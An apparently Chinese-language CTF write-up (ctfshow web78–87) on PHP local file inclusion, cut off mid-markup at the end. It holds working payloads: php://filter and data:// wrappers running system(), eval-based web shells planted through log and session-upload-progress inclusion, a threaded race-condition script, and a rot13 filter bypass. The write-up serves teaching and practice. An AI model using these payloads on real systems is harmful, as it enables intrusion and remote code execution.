{"id":278,"date":"2022-09-15T01:29:53","date_gmt":"2022-09-14T17:29:53","guid":{"rendered":"http:\/\/162.14.82.114\/?p=278"},"modified":"2022-09-15T01:29:53","modified_gmt":"2022-09-14T17:29:53","slug":"web%e5%85%a5%e9%97%a8-%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/278\/09\/15\/2022\/","title":{"rendered":"WEB\u5165\u95e8\u2014\u2014\u6587\u4ef6\u5305\u542b"},"content":{"rendered":"<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209150126221.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209150126221.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220915012654210\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h1>web78<\/h1>\n<pre><code class=\"language-text\">\u6b64\u9898\u4e3a \u3010\u4ece0\u5f00\u59cb\u5b66web\u3011\u7cfb\u5217\u7b2c\u4e03\u5341\u516b\u9898\n\u6b64\u7cfb\u5217\u9898\u76ee\u4ece\u6700\u57fa\u7840\u5f00\u59cb\uff0c\u9898\u76ee\u9075\u5faa\u5faa\u5e8f\u6e10\u8fdb\u7684\u539f\u5219\n\u5e0c\u671b\u5bf9\u5b66\u4e60CTF WEB\u7684\u540c\u5b66\u6709\u6240\u5e2e\u52a9\u3002\n\u6587\u4ef6\u5305\u542b\u7cfb\u5217\u5f00\u59cb<\/code><\/pre>\n<pre><code class=\"language-php\">&lt;?php\nif(isset($_GET[&#039;file&#039;])){\n    $file = $_GET[&#039;file&#039;];\n    include($file);\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n<p>\u6ca1\u6709\u4efb\u4f55\u8fc7\u6ee4\uff0c\u76f4\u63a5\u4f7f\u7528\u4f2a\u534f\u8bae\u8bfb\u53d6\u5373\u53ef\uff1a<code>(Hackbar\u7684LFI\u91cc\u6709\u96c6\u6210\u597d\u7684\u6a21\u5757\uff0c\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528)<\/code><\/p>\n<pre><code class=\"language-php\">\/?file=php:\/\/filter\/convert.base64-encode\/resource=flag.php<\/code><\/pre>\n<pre><code class=\"language-text\">PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0xNiAxMDo1NToxMQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMTYgMTA6NTU6MjANCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KDQokZmxhZz0iY3Rmc2hvd3sxYTNlZTEwOS1iOGNiLTQ3ZjYtYTdjMi1hNjI2NmI4MmY4MGN9Ijs=\n-------------------------------------------------------------\n&lt;?php\n\n\/*\n# -*- coding: utf-8 -*-\n# @Author: h1xa\n# @Date:   2020-09-16 10:55:11\n# @Last Modified by:   h1xa\n# @Last Modified time: 2020-09-16 10:55:20\n# @email: h1xa@ctfer.com\n# @link: https:\/\/ctfer.com\n\n*\/\n\n$flag=&quot;ctfshow{1a3ee109-b8cb-47f6-a7c2-a6266b82f80c}&quot;;<\/code><\/pre>\n<p>\u5f97\u5230flag\uff01\uff01\uff01<\/p>\n<h2>Hint<\/h2>\n<pre><code class=\"language-php\">?file=php:\/\/filter\/convert.base64-encode\/resource=flag.php<\/code><\/pre>\n<h1>web79<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nif(isset($_GET[&#039;file&#039;])){\n    $file = $_GET[&#039;file&#039;];\n    $file = str_replace(&quot;php&quot;, &quot;???&quot;, $file);\n    include($file);\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n<p>\u5bf9<code>php<\/code>\u8fdb\u884c\u4e86\u8fc7\u6ee4\u3002<\/p>\n<h2>\u89e3\u6cd5\u4e00\uff1abase\u7f16\u7801\u7ed5\u8fc7<\/h2>\n<p>\u4f7f\u7528base64\u7f16\u7801\u8fdb\u884c\u7ed5\u8fc7\u3002\u3002<\/p>\n<pre><code class=\"language-php\">?file=data:\/\/text\/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs\/Pg==<\/code><\/pre>\n<p>\u67e5\u770b\u6e90\u4ee3\u7801\u5f97\u5230flag\uff01\uff01\uff01<\/p>\n<h2>\u89e3\u6cd5\u4e8c\uff1adata\u534f\u8bae+\u6b63\u5219\u5339\u914d\u66ff\u6362<\/h2>\n<pre><code class=\"language-php\">file=data:\/\/text\/plain,&lt;?=system(&#039;tac fl*&#039;);?&gt;<\/code><\/pre>\n<h2>\u89e3\u6cd5\u4e09\uff1a\u4f20shell<\/h2>\n<pre><code class=\"language-php\">file=data:\/\/text\/plain,&lt;?=eval($_POST[1]);?&gt;\nPOST 1=phpinfo();<\/code><\/pre>\n<h2>Hint<\/h2>\n<pre><code class=\"language-php\">?file=data:\/\/text\/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=\nPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===&gt; &lt;?php system(&#039;cat flag.php&#039;);<\/code><\/pre>\n<h1>web80<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nif(isset($_GET[&#039;file&#039;])){\n    $file = $_GET[&#039;file&#039;];\n    $file = str_replace(&quot;php&quot;, &quot;???&quot;, $file);\n    $file = str_replace(&quot;data&quot;, &quot;???&quot;, $file);\n    include($file);\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n<p>\u8fc7\u6ee4\u4e86<code>php<\/code>,<code>data<\/code>\uff0c\u60f3\u7740\u5305\u542b\u7cfb\u7edf\u5df2\u7ecf\u6709\u7684\u6587\u4ef6\uff0c\u4f8b\u5982 linux \u4e0b\u7684<code>var\/log\/nginx\/access.log<\/code>\u65e5\u5fd7\u6587\u4ef6\uff0c\u65e5\u5fd7\u5305\u542b\u3002<\/p>\n<h2>\u65e5\u5fd7\u5305\u542b<\/h2>\n<h3>\u6587\u4ef6\u5934\u4f20\u5165eval<\/h3>\n<pre><code class=\"language-php\">user-agent: &lt;?php @eval($_POST[&#039;a&#039;]); ?&gt;<\/code><\/pre>\n<h3>\u5305\u542b\u65e5\u5fd7\u6587\u4ef6<\/h3>\n<pre><code class=\"language-php\">\/?file=\/var\/log\/nginx\/access.log<\/code><\/pre>\n<h3>POST\u53d1\u9001\u547d\u4ee4<\/h3>\n<pre><code class=\"language-php\">a=system(&#039;ls&#039;);<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209150126631.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209150126631.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220914154052886\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u627e\u5230\u6587\u4ef6\u540d\uff0c<del>\u76f4\u63a5<code>cat<\/code>\u5373\u53ef:<\/del>\u76f4\u63a5<code>tac<\/code>\u5373\u53ef\uff01<\/p>\n<pre><code class=\"language-php\">a=system(&#039;tac fl0g.php&#039;);<\/code><\/pre>\n<p>\u5f97\u5230 flag\uff01\uff01\uff01<\/p>\n<h2>Hint<\/h2>\n<pre><code class=\"language-text\">\u5305\u542b\u65e5\u5fd7\u6587\u4ef6 \u8fdb\u884cgetshell \u65e5\u5fd7\u6587\u4ef6\u8def\u5f84\uff1a ?file=\/var\/log\/nginx\/access.log<\/code><\/pre>\n<h1>web81<\/h1>\n<pre><code class=\"language-text\">\u505a\u5b8c\u8fd9\u9053\u9898\uff0c\u4f60\u5c31\u5df2\u7ecf\u7ecf\u5386\u7684\u4e5d\u4e5d\u516b\u5341\u4e00\u96be\uff0c\u662f\u4e0d\u662f\u611f\u89c9\u5f88\u5feb\uff1f\n\u6ca1\u5173\u7cfb\uff0c\u540e\u9762\u8fd8\u662f\u4e5d\u767e\u4e00\u5341\u4e5d\u96be\uff0c\u52a0\u6cb9\u5427\uff0c\u5c11\u5e74\uff01<\/code><\/pre>\n<pre><code class=\"language-php\">&lt;?php\nif(isset($_GET[&#039;file&#039;])){\n    $file = $_GET[&#039;file&#039;];\n    $file = str_replace(&quot;php&quot;, &quot;???&quot;, $file);\n    $file = str_replace(&quot;data&quot;, &quot;???&quot;, $file);\n    $file = str_replace(&quot;:&quot;, &quot;???&quot;, $file);\n    include($file);\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n<p>\u8bd5\u8bd5\u4e0a\u4e00\u9898\u7684\u601d\u8def\u770b\u770b\u53ef\u4ee5\u4e0d\u3002\u3002\u3002\u3002\u3002\u662f\u53ef\u4ee5\u7684\uff01<\/p>\n<h2>Hint<\/h2>\n<pre><code class=\"language-text\">\u5305\u542b\u65e5\u5fd7\u6587\u4ef6 \u8fdb\u884cgetshell \u65e5\u5fd7\u6587\u4ef6\u8def\u5f84\uff1a ?file=\/var\/log\/nginx\/access.log<\/code><\/pre>\n<h1>web82<\/h1>\n<p><strong>\u7ade\u4e89\u73af\u5883\u9700\u8981\u665a\u4e0a11\u70b930\u5206\u81f3\u6b21\u65e57\u65f630\u5206\u4e4b\u95f4\u505a\uff0c\u5176\u4ed6\u65f6\u95f4\u4e0d\u5f00\u653e\u7ade\u4e89\u6761\u4ef6<\/strong><\/p>\n<pre><code class=\"language-php\">&lt;?php\nif(isset($_GET[&#039;file&#039;])){\n    $file = $_GET[&#039;file&#039;];\n    $file = str_replace(&quot;php&quot;, &quot;???&quot;, $file);\n    $file = str_replace(&quot;data&quot;, &quot;???&quot;, $file);\n    $file = str_replace(&quot;:&quot;, &quot;???&quot;, $file);\n    $file = str_replace(&quot;.&quot;, &quot;???&quot;, $file);\n    include($file);\n}else{\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n<p>\u4e4b\u524d\u542c\u8bf4\u5927\u5e08\u5085\u628a\u7f51\u7ad9\u4fee\u4e86\u4ee5\u540e\u767d\u5929\u53ef\u4ee5\u505a\u4e86\u4e0d\u77e5\u9053\u5bf9\u4e0d\u5bf9\uff0c\u8bd5\u8bd5\uff01<\/p>\n<blockquote>\n<p>\u5728cookie\u5904\u6dfb\u52a0PHPSESSID\uff0c\u8fd9\u6837\u63d0\u4ea4\u7684\u8bdd\u4f1a\u5728\u9ed8\u8ba4session\u76ee\u5f55\u4e0b\u751f\u6210\u7c7b\u4f3c\u4e8esess_aaa\u7684\u6587\u4ef6\uff0c\u9ed8\u8ba4\u4e34\u65f6\u76ee\u5f55\u4e3a\/tmp\/sess_aaa\uff0c\u8fd9\u4e2a\u6587\u4ef6\u540d\u5b57\u662f\u6211\u4eec\u53ef\u4ee5\u63a7\u5236\u7684<\/p>\n<p>\u63a7\u5236\u91cc\u9762\u7684\u5185\u5bb9\u9700\u8981PHP_SESSION_UPLOAD_PRGRESS\u53c2\u6570\uff0c\u662f\u7528\u6765\u83b7\u53d6\u5b9e\u65f6\u6587\u4ef6\u7684\u4e0a\u4f20\u8fdb\u5ea6\uff0c\u5b83\u4f1a\u8fd4\u56de\u4e00\u4e2asession\uff0c\u7528\u6765\u5b9e\u73b0\u5199\u5165\u7684\u5185\u5bb9<\/p>\n<\/blockquote>\n<h2>\u5927\u5e08\u5085\u6761\u4ef6\u7ade\u4e89\u811a\u672c\u89e3\u51b3<\/h2>\n<p>\u8fd9\u91cc\u76f4\u63a5\u767d\u5ad6\u4e00\u4e0b\u5927\u5e08\u5085\u7684\u811a\u672c\u5427\uff01<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209150126633.svg'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209150126633.svg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\u8d22\u8ff7\" style=\"zoom: 25%;\" \/><\/div><\/p>\n<pre><code class=\"language-php\">import requests\nimport io\nimport threading\n\nurl=&#039;http:\/\/4fb4c5f8-0655-4199-bb83-7c33b2c70259.challenge.ctf.show\/&#039;\nsessionid=&quot;ctfshow&quot;\ndata={\n    &quot;i&quot;:&quot;file_put_contents(&#039;\/var\/www\/html\/1.php&#039;,&#039;&lt;?php eval($_POST[1]);?&gt;&#039;);&quot;\n\n}\ndef write(session):\n    fileBytes = io.BytesIO(b&#039;a&#039;*1024*50)\n    while True:\n        response=session.post(url,\n            data={\n            &#039;PHP_SESSION_UPLOAD_PROGRESS&#039;:&#039;&lt;?php eval($_POST[1]);?&gt;&#039;\n            },\n            cookies={\n            &#039;PHPSESSID&#039;:sessionid\n            },\n            files={\n            &#039;file&#039;:(&#039;ctfshow.jpg&#039;,fileBytes)\n            }\n            )\n        # print(response.text)\n\ndef read(session):\n    while True:\n        response=session.post(url+&#039;?file=\/tmp\/sess_&#039;+sessionid,data=data,\n            cookies={\n            &#039;PHPSESSID&#039;:sessionid\n            }\n            )\n        response2=session.get(url+&#039;1.php&#039;);\n        if response2.status_code==200:\n            print(&#039;+++++++++++++++done+++++++++++++++&#039;)\n        else:\n            print(response2.status_code)\nif __name__ == &#039;__main__&#039;:\n    event=threading.Event()  #\u5f00\u542f\u591a\u7ebf\u7a0b\n    with requests.session() as session:\n        # read(session)\n        for i in range(5):\n            threading.Thread(target=write,args=(session,)).start()\n        for i in range(5):\n            threading.Thread(target=read,args=(session,)).start()\n\n    event.set()  #\u521d\u59cb\u5316<\/code><\/pre>\n<p>\u8dd1\u4e0d\u901a\u3002\u3002\u3002\u4e00\u76f4\u662f<code>503<\/code>,<code>404<\/code>\u4e4b\u7c7b\u7684\u3002\u3002\u3002\u3002\u3002<\/p>\n<p>\u95ee\u8fc7\u7fa4\u91cc\u7684\u5e08\u5085\u4e86\uff0c\u5e08\u5085\u4eec\u731c\u6d4b\u662f\u5e73\u53f0\u7684\u95ee\u9898\uff0c\u9650\u5236\u901f\u5ea6\uff0c\u592a\u6162\u53c8\u5305\u542b\u4e0d\u4e86\uff0c\u96be\u8fc7\u3002\u3002\u3002\u3002<\/p>\n<h2>bp\u6761\u4ef6\u7ade\u4e89<\/h2>\n<h3>\u5148\u6784\u9020\u4e00\u4e2a<code>POST<\/code>\u5305:<\/h3>\n<pre><code class=\"language-html\">&lt;!doctype html&gt;\n&lt;html lang=&quot;en&quot;&gt;\n&lt;head&gt;\n    &lt;meta charset=&quot;UTF-8&quot;&gt;\n    &lt;meta name=&quot;viewport&quot;\n          content=&quot;width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0&quot;&gt;\n    &lt;meta http-equiv=&quot;X-UA-Compatible&quot; content=&quot;ie=edge&quot;&gt;\n    &lt;title&gt;bp\u6761\u4ef6\u7ade\u4e89&lt;\/title&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n&lt;form action=&quot;http:\/\/2365b724-7bcd-4f24-bdec-7734babaa0c9.challenge.ctf.show\/&quot; method=&quot;post&quot;\n      enctype=&quot;multipart\/form-data&quot;&gt;\n    &lt;input type=&quot;hidden&quot; name=&quot;PHP_SESSION_UPLOAD_PROGRESS&quot; value=&quot;abc&quot;\/&gt;\n    &lt;input type=&quot;file&quot; name=&quot;fileupload&quot;\/&gt;\n    &lt;input type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;\u4e0a\u4f20\u6587\u4ef6&quot;\/&gt;\n&lt;\/form&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<h3>\u4e0a\u4f20\u6587\u4ef6\uff0c\u4fee\u6539\u5305<\/h3>\n<p>\u968f\u4fbf\u4e0a\u4f20\u4e00\u4e2a\u6587\u4ef6\uff0c\u518d\u52a0\u4e00\u4e2a<code>Cookie<\/code>\u4e0a\u53bb\uff0c\u5e76\u5728<code>PHP_SESSION_UPLOAD_PROGRESS<\/code>\u6dfb\u52a0\u547d\u4ee4\u8bed\u53e5\uff01<\/p>\n<pre><code class=\"language-text\">POST \/ HTTP\/1.1\nHost: 2365b724-7bcd-4f24-bdec-7734babaa0c9.challenge.ctf.show\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\/20100101 Firefox\/104.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nContent-Type: multipart\/form-data; boundary=---------------------------1089288147727247033254480883\nContent-Length: 489\nOrigin: http:\/\/localhost:63342\nConnection: close\nReferer: http:\/\/localhost:63342\/\nUpgrade-Insecure-Requests: 1\nCookie:PHPSESSID=flag\n\n-----------------------------1089288147727247033254480883\nContent-Disposition: form-data; name=&quot;PHP_SESSION_UPLOAD_PROGRESS&quot;\n\n\u00a7abc\u00a7&lt;?php system(&#039;ls&#039;);?&gt;\n-----------------------------1089288147727247033254480883\nContent-Disposition: form-data; name=&quot;fileupload&quot;; filename=&quot;a.php&quot;\nContent-Type: application\/octet-stream\n\n-----------------------------1089288147727247033254480883\nContent-Disposition: form-data; name=&quot;submit&quot;\n\n-----------------------------1089288147727247033254480883--<\/code><\/pre>\n<h3>\u8bbf\u95ee?file=\/tmp\/sess_flag\uff0c\u4fee\u6539\u5305<\/h3>\n<p>\u6211\u6ca1\u8dd1\u51fa\u6765\uff0c\u79bb\u5927\u6d66\u4e86\uff0c\u8fd8\u662f\u7b49\u534a\u4e2a\u5c0f\u65f6\u4ee5\u540e\u523011\uff1a30\u518d\u8bd5\u8bd5\u811a\u672c\u5427\u3002\u3002\u3002\u3002\u3002<\/p>\n<h3>payloads\u914d\u7f6e<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209150126634.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209150126634.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220914225550738\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>Hint<\/h2>\n<p><a href=\"https:\/\/www.freebuf.com\/vuls\/202819.html\">https:\/\/www.freebuf.com\/vuls\/202819.html<\/a> <\/p>\n<p>\u8fd9\u9053\u9898\u6709\u70b9\u50cfwmctf\u7684make php great again \u5229\u7528session\u5bf9\u8bdd\u8fdb\u884c\u6587\u4ef6\u5305\u542b\u5229\u7528 <\/p>\n<p><a href=\"https:\/\/blog.csdn.net\/qq_46091464\/article\/details\/108021053\">https:\/\/blog.csdn.net\/qq_46091464\/article\/details\/108021053<\/a><\/p>\n<h1>web83<\/h1>\n<pre><code class=\"language-text\">\u7ee7\u7eed\u5305\u542b<\/code><\/pre>\n<p><strong>\u7ade\u4e89\u73af\u5883\u9700\u8981\u665a\u4e0a11\u70b930\u5206\u81f3\u6b21\u65e57\u65f630\u5206\u4e4b\u95f4\u505a\uff0c\u5176\u4ed6\u65f6\u95f4\u4e0d\u5f00\u653e\u7ade\u4e89\u6761\u4ef6<\/strong><\/p>\n<p>\u540c<code>web82<\/code><\/p>\n<h2>Hint<\/h2>\n<pre><code class=\"language-php\">#poc.php\n&lt;!DOCTYPE html&gt;\n    &lt;html&gt;\n    &lt;body&gt;\n    &lt;form action=&quot;ip\u5730\u5740&quot; method=&quot;POST&quot; enctype=&quot;multipart\/form-data&quot;&gt;\n    &lt;input type=&quot;hidden&quot; name=&quot;PHP_SESSION_UPLOAD_PROGRESS&quot; value=&quot;2333&quot; \/&gt;\n    &lt;input type=&quot;file&quot; name=&quot;file&quot; \/&gt;\n    &lt;input type=&quot;submit&quot; value=&quot;submit&quot; \/&gt;\n    &lt;\/form&gt;\n    &lt;\/body&gt;\n    &lt;\/html&gt;\n    &lt;?php\n    session_start();\n?&gt;<\/code><\/pre>\n<h1>web84<\/h1>\n<pre><code class=\"language-text\">\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e<\/code><\/pre>\n<p><strong>\u7ade\u4e89\u73af\u5883\u9700\u8981\u665a\u4e0a11\u70b930\u5206\u81f3\u6b21\u65e57\u65f630\u5206\u4e4b\u95f4\u505a\uff0c\u5176\u4ed6\u65f6\u95f4\u4e0d\u5f00\u653e\u7ade\u4e89\u6761\u4ef6<\/strong><\/p>\n<p>\u540c<code>web82<\/code><\/p>\n<h2>Hint<\/h2>\n<pre><code class=\"language-php\">#poc.php\n&lt;!DOCTYPE html&gt;\n    &lt;html&gt;\n    &lt;body&gt;\n    &lt;form action=&quot;ip\u5730\u5740&quot; method=&quot;POST&quot; enctype=&quot;multipart\/form-data&quot;&gt;\n    &lt;input type=&quot;hidden&quot; name=&quot;PHP_SESSION_UPLOAD_PROGRESS&quot; value=&quot;2333&quot; \/&gt;\n    &lt;input type=&quot;file&quot; name=&quot;file&quot; \/&gt;\n    &lt;input type=&quot;submit&quot; value=&quot;submit&quot; \/&gt;\n    &lt;\/form&gt;\n    &lt;\/body&gt;\n    &lt;\/html&gt;\n    &lt;?php\n    session_start();\n?&gt;<\/code><\/pre>\n<h1>web85<\/h1>\n<pre><code class=\"language-text\">\u7ee7\u7eed\u5305\u542b<\/code><\/pre>\n<p><strong>\u7ade\u4e89\u73af\u5883\u9700\u8981\u665a\u4e0a11\u70b930\u5206\u81f3\u6b21\u65e57\u65f630\u5206\u4e4b\u95f4\u505a\uff0c\u5176\u4ed6\u65f6\u95f4\u4e0d\u5f00\u653e\u7ade\u4e89\u6761\u4ef6<\/strong><\/p>\n<p>\u540c<code>web82<\/code><\/p>\n<h2>Hint<\/h2>\n<pre><code class=\"language-php\">#poc.php\n&lt;!DOCTYPE html&gt;\n    &lt;html&gt;\n    &lt;body&gt;\n    &lt;form action=&quot;ip\u5730\u5740&quot; method=&quot;POST&quot; enctype=&quot;multipart\/form-data&quot;&gt;\n    &lt;input type=&quot;hidden&quot; name=&quot;PHP_SESSION_UPLOAD_PROGRESS&quot; value=&quot;2333&quot; \/&gt;\n    &lt;input type=&quot;file&quot; name=&quot;file&quot; \/&gt;\n    &lt;input type=&quot;submit&quot; value=&quot;submit&quot; \/&gt;\n    &lt;\/form&gt;\n    &lt;\/body&gt;\n    &lt;\/html&gt;\n    &lt;?php\n    session_start();\n?&gt;<\/code><\/pre>\n<h1>web86<\/h1>\n<pre><code class=\"language-text\">\u7ee7\u7eed\u79c0<\/code><\/pre>\n<p><strong>\u7ade\u4e89\u73af\u5883\u9700\u8981\u665a\u4e0a11\u70b930\u5206\u81f3\u6b21\u65e57\u65f630\u5206\u4e4b\u95f4\u505a\uff0c\u5176\u4ed6\u65f6\u95f4\u4e0d\u5f00\u653e\u7ade\u4e89\u6761\u4ef6<\/strong><\/p>\n<p>\u540c<code>web82<\/code><\/p>\n<h2>Hint<\/h2>\n<pre><code class=\"language-php\">#poc.php\n&lt;!DOCTYPE html&gt;\n    &lt;html&gt;\n    &lt;body&gt;\n    &lt;form action=&quot;ip\u5730\u5740&quot; method=&quot;POST&quot; enctype=&quot;multipart\/form-data&quot;&gt;\n    &lt;input type=&quot;hidden&quot; name=&quot;PHP_SESSION_UPLOAD_PROGRESS&quot; value=&quot;2333&quot; \/&gt;\n    &lt;input type=&quot;file&quot; name=&quot;file&quot; \/&gt;\n    &lt;input type=&quot;submit&quot; value=&quot;submit&quot; \/&gt;\n    &lt;\/form&gt;\n    &lt;\/body&gt;\n    &lt;\/html&gt;\n    &lt;?php\n    session_start();\n?&gt;<\/code><\/pre>\n<h1>web87<\/h1>\n<pre><code class=\"language-text\">\u7ee7\u7eed\u79c0<\/code><\/pre>\n<pre><code class=\"language-php\">&lt;?php\n    if(isset($_GET[&#039;file&#039;])){\n        $file = $_GET[&#039;file&#039;];\n        $content = $_POST[&#039;content&#039;];\n        $file = str_replace(&quot;php&quot;, &quot;???&quot;, $file);\n        $file = str_replace(&quot;data&quot;, &quot;???&quot;, $file);\n        $file = str_replace(&quot;:&quot;, &quot;???&quot;, $file);\n        $file = str_replace(&quot;.&quot;, &quot;???&quot;, $file);\n        file_put_contents(urldecode($file), &quot;&lt;?php die(&#039;\u5927\u4f6c\u522b\u79c0\u4e86&#039;);?&gt;&quot;.$content);\n    }else{\n        highlight_file(__FILE__);\n    }<\/code><\/pre>\n<h2>rot13\u8fc7\u6ee4\u5668\u8fdb\u884c\u7f16\u7801\uff08\u5927\u5e08\u5085\u89e3\u6cd5\uff09<\/h2>\n<pre><code class=\"language-php\">\/?file=php:\/\/filter\/write=string.rot13\/resource=2.php<\/code><\/pre>\n<p>\u5728post\u5185\u5bb9\u91cc\u5199\uff1a<\/p>\n<pre><code class=\"language-php\">content=&lt;?php system(&#039;tac f*.php&#039;);?&gt;<\/code><\/pre>\n<p>\u4f46\u662f\u9898\u76ee\u5bf9<code>file<\/code>\u8fdb\u884c\u4e86\u89e3\u7801\uff0c\u6240\u4ee5\u8fd9\u91cc\u6211\u4eec\u8981\u8fde\u7eed\u7f16\u7801\u4e24\u6b21\uff1a<\/p>\n<pre><code class=\"language-text\">php:\/\/filter\/write=string.rot13\/resource=2.php\n----------------------------------------\n%70%68%70%3a%2f%2f%66%69%6c%74%65%72%2f%77%72%69%74%65%3d%73%74%72%69%6e%67%2e%72%6f%74%31%33%2f%72%65%73%6f%75%72%63%65%3d%32%2e%70%68%70\n----------------------------------------\n%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%65%25%37%32%25%36%66%25%37%34%25%33%31%25%33%33%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%32%25%32%65%25%37%30%25%36%38%25%37%30<\/code><\/pre>\n<p>\u518d\u5bf9POST\u5185\u5bb9\u8fdb\u884crot\u7f16\u7801\uff1a<\/p>\n<pre><code class=\"language-text\">&lt;?php system(&#039;tac f*.php&#039;);?&gt;\n----------------------------------------\n&lt;?cuc flfgrz(&#039;gnp s*.cuc&#039;);?&gt;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202209150126635.png'><img class=\"lazyload lazyload-style-2\" 